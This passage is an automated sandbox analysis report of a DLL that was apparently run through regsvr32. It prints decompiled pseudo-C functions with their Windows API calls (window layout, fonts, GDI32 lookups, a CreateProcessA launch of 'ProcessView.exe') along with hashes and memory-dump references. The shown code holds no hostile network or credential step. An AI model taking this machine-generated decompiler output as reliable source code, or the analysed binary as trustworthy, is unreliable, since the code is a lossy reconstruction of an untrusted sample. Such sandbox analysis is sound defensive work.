                                                                                                                					 *(_t91 - 4) = 1;
                                                                                                                					E100246A4(_t74, _t91 - 0x8c, 0, _t90, __eflags);
                                                                                                                					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
                                                                                                                					E10001020( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
                                                                                                                				}
                                                                                                                				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
                                                                                                                				 *((intOrPtr*)(_t91 - 0x54)) = 0x100572c4;
                                                                                                                				E10024848(_t91 - 0x54);
                                                                                                                				return E1003D2D2(_t74, 0, _t90);
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1001EC79
                                                                                                                • GetObjectA.GDI32(10004B40,0000003C,?), ref: 1001ECCB
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 1001ED3B
                                                                                                                • OleCreateFontIndirect.OLEAUT32(00000020,1005FB14), ref: 1001ED67
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                • String ID:
                                                                                                                • API String ID: 2429671754-3916222277
                                                                                                                • Opcode ID: fd6a83b91025a1e243d81439bf92102b6f9ea5486c0032e63b3cc1f7a9fd35ba
                                                                                                                • Instruction ID: 2ac9b723a89d01decfb637a09a62b78833065597251375f61e3161f746e419ea
                                                                                                                • Opcode Fuzzy Hash: fd6a83b91025a1e243d81439bf92102b6f9ea5486c0032e63b3cc1f7a9fd35ba
                                                                                                                • Instruction Fuzzy Hash: F1418938D012899EDB10DFE4D945ADCBBF4EF18340F10805AE856AB292EBB49A85CB11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 55%
                                                                                                                			E1000BBD0(void* __ebx, void* __ecx, void* __ebp) {
                                                                                                                				short _v8;
                                                                                                                				char _v12;
                                                                                                                				char _v16;
                                                                                                                				char _v32;
                                                                                                                				char _v40;
                                                                                                                				char _v52;
                                                                                                                				char _v60;
                                                                                                                				char _v68;
                                                                                                                				char _v72;
                                                                                                                				char _v80;
                                                                                                                				char _v92;
                                                                                                                				char _v100;
                                                                                                                				char _v104;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t23;
                                                                                                                				void* _t26;
                                                                                                                				void* _t64;
                                                                                                                				intOrPtr* _t66;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10051888);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t23 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t23 ^ _t68 - 0x00000038);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t64 = __ecx;
                                                                                                                				_t26 = E10018B24(__ecx, 0x10058060, 0x10058070, 0x34);
                                                                                                                				if(_t26 == 6) {
                                                                                                                					_v60 = 0;
                                                                                                                					E1002A52A(__ebx,  &_v60, 0, __ecx, 0);
                                                                                                                					_v8 = 0;
                                                                                                                					E1002A12B( &_v32);
                                                                                                                					_v12 = 1;
                                                                                                                					E1002A12B( &_v52);
                                                                                                                					_v16 = 2;
                                                                                                                					E100011D0( &_v80,  &_v72,  &_v40);
                                                                                                                					E1001614A( &_v92);
                                                                                                                					E10001270( &_v92,  &_v68);
                                                                                                                					E1001614A( &_v100);
                                                                                                                					Sleep(0x514);
                                                                                                                					E10001360(_t64 + 0x298, "Ozzar");
                                                                                                                					E10019B72(__ebx, _t64, _t64 + 0x2a0, 0);
                                                                                                                					_t66 = __imp__#9;
                                                                                                                					 *_t66( &_v80, 0x10058314);
                                                                                                                					 *_t66( &_v68);
                                                                                                                					_t26 =  *_t66( &_v104);
                                                                                                                				}
                                                                                                                				 *[fs:0x0] = _v12;
                                                                                                                				return _t26;
                                                                                                                			}
























                                                                                                                APIs
                                                                                                                  • Part of subcall function 1002A52A: __EH_prolog3.LIBCMT ref: 1002A534
                                                                                                                  • Part of subcall function 1002A52A: VariantClear.OLEAUT32 ref: 1002A53C
                                                                                                                  • Part of subcall function 1002A12B: _memset.LIBCMT ref: 1002A133
                                                                                                                • Sleep.KERNEL32(00000514,10058070,10058060,?), ref: 1000BC8C
                                                                                                                • VariantClear.OLEAUT32(?), ref: 1000BCB4
                                                                                                                • VariantClear.OLEAUT32(?), ref: 1000BCBB
                                                                                                                • VariantClear.OLEAUT32(10058070), ref: 1000BCC2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant$H_prolog3Sleep_memset
                                                                                                                • String ID: Ozzar
                                                                                                                • API String ID: 3417858741-2206785293
                                                                                                                • Opcode ID: 7159e6c18851930088be3620f45020f257766a4bb415863c32cdff60577850bd
                                                                                                                • Instruction ID: 9694449ef2e57fff831d88a67ed3a40869d929435a6cd09dc07e0504fd4c6e23
                                                                                                                • Opcode Fuzzy Hash: 7159e6c18851930088be3620f45020f257766a4bb415863c32cdff60577850bd
                                                                                                                • Instruction Fuzzy Hash: 89217F76408240ABD304DB64DC81E9FB7E9EFD9B50F400A1DF64693291EB70F608CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E1001764E(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				void _v20;
                                                                                                                				int _t14;
                                                                                                                				int _t18;
                                                                                                                				intOrPtr* _t23;
                                                                                                                				void* _t25;
                                                                                                                
                                                                                                                				if(E100174A2() == 0) {
                                                                                                                					if(_a4 != 0x12340042) {
                                                                                                                						L9:
                                                                                                                						_t14 = 0;
                                                                                                                						L10:
                                                                                                                						return _t14;
                                                                                                                					}
                                                                                                                					_t23 = _a8;
                                                                                                                					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                                                                                                						goto L9;
                                                                                                                					} else {
                                                                                                                						 *((intOrPtr*)(_t23 + 4)) = 0;
                                                                                                                						 *((intOrPtr*)(_t23 + 8)) = 0;
                                                                                                                						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                                                                                                                						_t18 = GetSystemMetrics(1);
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						 *(_t23 + 0x10) = _t18;
                                                                                                                						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                                                                                                                						if( *_t23 >= 0x48) {
                                                                                                                							E1003D4C2(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
                                                                                                                						}
                                                                                                                						_t14 = 1;
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return  *0x10070958(_a4, _a8);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1001768C
                                                                                                                • GetSystemMetrics.USER32 ref: 100176A4
                                                                                                                • GetSystemMetrics.USER32 ref: 100176AB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: System$Metrics$InfoParameters
                                                                                                                • String ID: B$DISPLAY
                                                                                                                • API String ID: 3136151823-3316187204
                                                                                                                • Opcode ID: a281f1a2a76fb861f7022dffc9981ca34a3327ed434053b80bbe1aca0a8fef2a
                                                                                                                • Instruction ID: 6fcbc85e4d8e5bbfcc73a28f88d89189f4e8f22adf0df611ee1fa90d055e708e
                                                                                                                • Opcode Fuzzy Hash: a281f1a2a76fb861f7022dffc9981ca34a3327ed434053b80bbe1aca0a8fef2a
                                                                                                                • Instruction Fuzzy Hash: DD119471600624ABDB11DF68DC8499B7BB8FF05790F004451FD49AE145D671D990CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10020DE6(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
                                                                                                                				void* __edi;
                                                                                                                				struct HWND__* _t10;
                                                                                                                				struct HWND__* _t12;
                                                                                                                				struct HWND__* _t14;
                                                                                                                				struct HWND__* _t15;
                                                                                                                				int _t19;
                                                                                                                				void* _t21;
                                                                                                                				void* _t25;
                                                                                                                				struct HWND__** _t26;
                                                                                                                				void* _t27;
                                                                                                                
                                                                                                                				_t25 = __edx;
                                                                                                                				_t21 = __ebx;
                                                                                                                				_t26 = _a4;
                                                                                                                				_t27 = __ecx;
                                                                                                                				if(E10017E39(__ecx, __eflags, _t26) == 0) {
                                                                                                                					_t10 = E1001A547(__ecx);
                                                                                                                					__eflags = _t10;
                                                                                                                					if(_t10 == 0) {
                                                                                                                						L5:
                                                                                                                						__eflags = _t26[1] - 0x100;
                                                                                                                						if(_t26[1] != 0x100) {
                                                                                                                							L13:
                                                                                                                							return E1001839A(_t26);
                                                                                                                						}
                                                                                                                						_t12 = _t26[2];
                                                                                                                						__eflags = _t12 - 0x1b;
                                                                                                                						if(_t12 == 0x1b) {
                                                                                                                							L8:
                                                                                                                							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							_t14 = E1002D8E6(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
                                                                                                                							__eflags = _t14;
                                                                                                                							if(_t14 == 0) {
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
                                                                                                                							__eflags = _t15;
                                                                                                                							if(_t15 == 0) {
                                                                                                                								L12:
                                                                                                                								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							_t19 = IsWindowEnabled(_t15);
                                                                                                                							__eflags = _t19;
                                                                                                                							if(_t19 == 0) {
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						__eflags = _t12 - 3;
                                                                                                                						if(_t12 != 3) {
                                                                                                                							goto L13;
                                                                                                                						}
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					__eflags =  *(_t10 + 0x68);
                                                                                                                					if( *(_t10 + 0x68) == 0) {
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				return 1;
                                                                                                                			}














                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Edit
                                                                                                                • API String ID: 0-554135844
                                                                                                                • Opcode ID: 7bb1b066d883c2fbdd10517dc8fcad8b20b68afe56aeac0873b27eff604e75e7
                                                                                                                • Instruction ID: 06f3a3bee65783aba18e869f62ac87e4262ed707e221f70f68d5299a2e5d6882
                                                                                                                • Opcode Fuzzy Hash: 7bb1b066d883c2fbdd10517dc8fcad8b20b68afe56aeac0873b27eff604e75e7
                                                                                                                • Instruction Fuzzy Hash: 34018E34640302ABEE50D721AC09B5AB6EAEF08790F920E28F416D20B3DB70ECD0C920
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000B240(void* __ecx, void* __edi, void* __eflags) {
                                                                                                                				struct _STARTUPINFOA _v68;
                                                                                                                				struct _PROCESS_INFORMATION _v84;
                                                                                                                				void* _t17;
                                                                                                                
                                                                                                                				_t17 = __ecx;
                                                                                                                				E1003BB70(__edi,  &_v68, 0, 0x44);
                                                                                                                				_v68.cb = 0x44;
                                                                                                                				if(CreateProcessA(0, "ProcessView.exe", 0, 0, 1, 8, 0, 0,  &_v68,  &_v84) == 0) {
                                                                                                                					return E10018B24(_t17, 0x10058008, 0, 0);
                                                                                                                				} else {
                                                                                                                					return WaitForSingleObject(_v84, 0xffffffff);
                                                                                                                				}
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1000B24F
                                                                                                                • CreateProcessA.KERNEL32 ref: 1000B27C
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000B28D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateObjectProcessSingleWait_memset
                                                                                                                • String ID: D$ProcessView.exe
                                                                                                                • API String ID: 288585173-1757985642
                                                                                                                • Opcode ID: fa07df7b5a9862bcb48e3c1edbb2c3201dc83e5488c38767f15664d2f9243538
                                                                                                                • Instruction ID: cf2dc463d70a2e16d58366621b96bc61bac375d13409f33c490884f4da629055
                                                                                                                • Opcode Fuzzy Hash: fa07df7b5a9862bcb48e3c1edbb2c3201dc83e5488c38767f15664d2f9243538
                                                                                                                • Instruction Fuzzy Hash: CEF09AB12843107AF264DB148C87FCB37A5AB85F50F904508F745AE1C0EBF5E60C878A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E10023E8C(void* __ecx, intOrPtr _a4) {
                                                                                                                				struct HINSTANCE__* _t4;
                                                                                                                				_Unknown_base(*)()* _t5;
                                                                                                                				void* _t9;
                                                                                                                				void* _t10;
                                                                                                                
                                                                                                                				_t10 = __ecx;
                                                                                                                				_t4 = GetModuleHandleA("GDI32.DLL");
                                                                                                                				_t9 = 0;
                                                                                                                				_t5 = GetProcAddress(_t4, "SetLayout");
                                                                                                                				if(_t5 == 0) {
                                                                                                                					if(_a4 != 0) {
                                                                                                                						_t9 = 0xffffffff;
                                                                                                                						SetLastError(0x78);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                			}







                                                                                                                0x10023ecf

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,1003A169,00000000), ref: 10023E95
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetLayout,?,?,1003A169,00000000), ref: 10023EA3
                                                                                                                • SetLastError.KERNEL32(00000078,?,?,1003A169,00000000), ref: 10023EC5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorHandleLastModuleProc
                                                                                                                • String ID: GDI32.DLL$SetLayout
                                                                                                                • API String ID: 4275029093-2147214759
                                                                                                                • Opcode ID: a8382d7f1f37330da1796f59796bdd5d8c41d223a18a8ba9b34e90e1786fdbf0
                                                                                                                • Instruction ID: ad81cc4bcf626707de2ed7daadfe46b2e2437c35453d77d6f97349e8d1b0081d
                                                                                                                • Opcode Fuzzy Hash: a8382d7f1f37330da1796f59796bdd5d8c41d223a18a8ba9b34e90e1786fdbf0
                                                                                                                • Instruction Fuzzy Hash: A7E04F32504514ABDB61A725AC4C85F7BA2EBC8772756CA26F675C20E0CB3188498B61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E10023E56(signed int __ecx) {
                                                                                                                				_Unknown_base(*)()* _t3;
                                                                                                                				signed int _t7;
                                                                                                                				signed int _t8;
                                                                                                                
                                                                                                                				_t7 = __ecx;
                                                                                                                				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
                                                                                                                				if(_t3 == 0) {
                                                                                                                					_t8 = _t7 | 0xffffffff;
                                                                                                                					SetLastError(0x78);
                                                                                                                				} else {
                                                                                                                					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
                                                                                                                				}
                                                                                                                				return _t8;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(GDI32.DLL,?,1003A15C), ref: 10023E5E
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10023E6A
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 10023E82
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorHandleLastModuleProc
                                                                                                                • String ID: GDI32.DLL$GetLayout
                                                                                                                • API String ID: 4275029093-2396518106
                                                                                                                • Opcode ID: e174fa2591516e2392b9f2d874f0bea4d04c8c2b3fae3cbe14be5c4ea432d4e1
                                                                                                                • Instruction ID: 033f20c47d496fe00651347abdbe6ae7a7e14d50a9bdf03d85af1cf620874e74
                                                                                                                • Opcode Fuzzy Hash: e174fa2591516e2392b9f2d874f0bea4d04c8c2b3fae3cbe14be5c4ea432d4e1
                                                                                                                • Instruction Fuzzy Hash: EED05B3290063467DB5057747C4C9577B94DB086713064665FD35D31E0DF30DD08C790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 63%
                                                                                                                			E10038B31(intOrPtr __ecx, void* __edx) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t73;
                                                                                                                				signed char _t81;
                                                                                                                				signed int _t86;
                                                                                                                				signed int _t91;
                                                                                                                				signed int _t93;
                                                                                                                				signed int _t101;
                                                                                                                				signed int _t117;
                                                                                                                				intOrPtr _t131;
                                                                                                                				void* _t132;
                                                                                                                				intOrPtr _t139;
                                                                                                                				void* _t153;
                                                                                                                				signed int _t157;
                                                                                                                				void* _t158;
                                                                                                                				intOrPtr _t161;
                                                                                                                				void* _t162;
                                                                                                                				signed int _t164;
                                                                                                                				void* _t166;
                                                                                                                
                                                                                                                				_t153 = __edx;
                                                                                                                				_t133 = __ecx;
                                                                                                                				_t164 = _t166 - 0xb8;
                                                                                                                				_t73 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				 *(_t164 + 0xb4) = _t73 ^ _t164;
                                                                                                                				_t161 =  *((intOrPtr*)(_t164 + 0xc0));
                                                                                                                				_t131 = __ecx;
                                                                                                                				_t170 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t164 - 0x58)) = _t161;
                                                                                                                				 *(_t164 - 0x54) =  *(_t164 + 0xc4);
                                                                                                                				if(__ecx == 0) {
                                                                                                                					L1:
                                                                                                                					E1001729E(_t131, _t133, 0, _t161, _t170);
                                                                                                                				}
                                                                                                                				if(_t161 == 0) {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				_t78 = GetWindowRect( *(_t161 + 0x20), _t164 - 0x80);
                                                                                                                				if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 ||  *(_t164 - 0x54) != 0 && EqualRect(_t164 - 0x80,  *(_t164 - 0x54)) == 0) {
                                                                                                                					if( *((intOrPtr*)(_t131 + 0x94)) != 0 && ( *(_t161 + 0x84) & 0x00000040) != 0) {
                                                                                                                						 *(_t131 + 0x80) =  *(_t131 + 0x80) | 0x00000040;
                                                                                                                					}
                                                                                                                					 *(_t131 + 0x80) =  *(_t131 + 0x80) & 0xfffffff9;
                                                                                                                					_t81 =  *(_t161 + 0x80) & 0x00000006 |  *(_t131 + 0x80);
                                                                                                                					_t178 = _t81 & 0x00000040;
                                                                                                                					 *(_t131 + 0x80) = _t81;
                                                                                                                					if((_t81 & 0x00000040) == 0) {
                                                                                                                						_push(0x104);
                                                                                                                						_push(_t164 - 0x50);
                                                                                                                						E1001D878(_t131, _t161, _t153, 0, _t161, _t178);
                                                                                                                						E1002D750(_t161, _t153,  *((intOrPtr*)(_t131 + 0x20)), _t164 - 0x50);
                                                                                                                					}
                                                                                                                					_t86 = ( *(_t161 + 0x80) ^  *(_t131 + 0x80)) & 0x0000f000 ^  *(_t161 + 0x80) | 0x00000f00;
                                                                                                                					if( *((intOrPtr*)(_t131 + 0x94)) == 0) {
                                                                                                                						_t87 = _t86 & 0xfffffffe;
                                                                                                                						__eflags = _t86 & 0xfffffffe;
                                                                                                                					} else {
                                                                                                                						_t87 = _t86 | 0x00000001;
                                                                                                                					}
                                                                                                                					E10035BBE(_t161, _t87);
                                                                                                                					 *((intOrPtr*)(_t164 - 0x6c)) = 0;
                                                                                                                					if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 && IsWindowVisible( *(_t161 + 0x20)) != 0) {
                                                                                                                						E1001D569(_t161, 0, 0, 0, 0, 0, 0x97);
                                                                                                                						 *((intOrPtr*)(_t164 - 0x6c)) = 1;
                                                                                                                					}
                                                                                                                					 *(_t164 - 0x70) =  *(_t164 - 0x70) | 0xffffffff;
                                                                                                                					if( *(_t164 - 0x54) == 0) {
                                                                                                                						_t60 = _t131 + 0x98; // 0x98
                                                                                                                						_t156 = _t60;
                                                                                                                						E1001F82B(_t131, _t60, _t164,  *((intOrPtr*)(_t60 + 8)), _t161);
                                                                                                                						E1001F82B(_t131, _t156, _t164,  *((intOrPtr*)(_t156 + 8)), 0);
                                                                                                                						_t91 =  *0x10070c84; // 0x2
                                                                                                                						_t157 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                						_t93 =  *0x10070c80; // 0x2
                                                                                                                						_t138 = _t161;
                                                                                                                						E1001D569(_t161, 0,  ~_t93,  ~_t91, 0, 0, 0x115);
                                                                                                                					} else {
                                                                                                                						CopyRect(_t164 - 0x68,  *(_t164 - 0x54));
                                                                                                                						E10024274(_t131, _t164 - 0x68);
                                                                                                                						asm("cdq");
                                                                                                                						asm("cdq");
                                                                                                                						_push(( *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)) - _t153 >> 1) +  *((intOrPtr*)(_t164 - 0x64)));
                                                                                                                						_push(( *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68) - _t153 >> 1) +  *(_t164 - 0x68));
                                                                                                                						_push( *((intOrPtr*)(_t164 - 0x58)));
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						_t117 = E1003881C(_t131);
                                                                                                                						_t138 =  *((intOrPtr*)(_t164 - 0x58));
                                                                                                                						 *(_t164 - 0x70) = _t117;
                                                                                                                						E1001D569( *((intOrPtr*)(_t164 - 0x58)), 0,  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x64)),  *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)), 0x114);
                                                                                                                						_t161 =  *((intOrPtr*)(_t164 - 0x58));
                                                                                                                						_t157 = 0;
                                                                                                                					}
                                                                                                                					if(E10019C16(_t131, _t138, _t164, GetParent( *(_t161 + 0x20))) != _t131) {
                                                                                                                						E100387A2(_t161, _t131);
                                                                                                                					}
                                                                                                                					_t139 =  *((intOrPtr*)(_t161 + 0x8c));
                                                                                                                					if(_t139 != _t131) {
                                                                                                                						__eflags = _t139 - _t157;
                                                                                                                						if(_t139 != _t157) {
                                                                                                                							__eflags =  *((intOrPtr*)(_t131 + 0x94)) - _t157;
                                                                                                                							if( *((intOrPtr*)(_t131 + 0x94)) == _t157) {
                                                                                                                								L28:
                                                                                                                								_t101 = 0;
                                                                                                                								__eflags = 0;
                                                                                                                							} else {
                                                                                                                								__eflags =  *((intOrPtr*)(_t139 + 0x94)) - _t157;
                                                                                                                								if( *((intOrPtr*)(_t139 + 0x94)) != _t157) {
                                                                                                                									goto L28;
                                                                                                                								} else {
                                                                                                                									_t101 = 1;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_push(_t101);
                                                                                                                							_push(0xffffffff);
                                                                                                                							goto L30;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_push(_t157);
                                                                                                                						_push( *(_t164 - 0x70));
                                                                                                                						L30:
                                                                                                                						_push(_t161);
                                                                                                                						E100389FA(_t139, _t157);
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t161 + 0x8c)) = _t131;
                                                                                                                					if( *((intOrPtr*)(_t164 - 0x6c)) != _t157) {
                                                                                                                						E1001D569(_t161, _t157, _t157, _t157, _t157, _t157, 0x57);
                                                                                                                					}
                                                                                                                					E10038993(_t131, _t131, _t164, _t161);
                                                                                                                					 *(E10035A2F(_t131) + 0xd0) =  *(_t78 + 0xd0) | 0x0000000c;
                                                                                                                				}
                                                                                                                				_pop(_t158);
                                                                                                                				_pop(_t162);
                                                                                                                				_pop(_t132);
                                                                                                                				return E1003B437(_t78, _t132,  *(_t164 + 0xb4) ^ _t164, _t153, _t158, _t162);
                                                                                                                			}

























                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32 ref: 10038B79
                                                                                                                • EqualRect.USER32 ref: 10038B97
                                                                                                                • IsWindowVisible.USER32(?), ref: 10038C3D
                                                                                                                • CopyRect.USER32(?,?), ref: 10038C6F
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
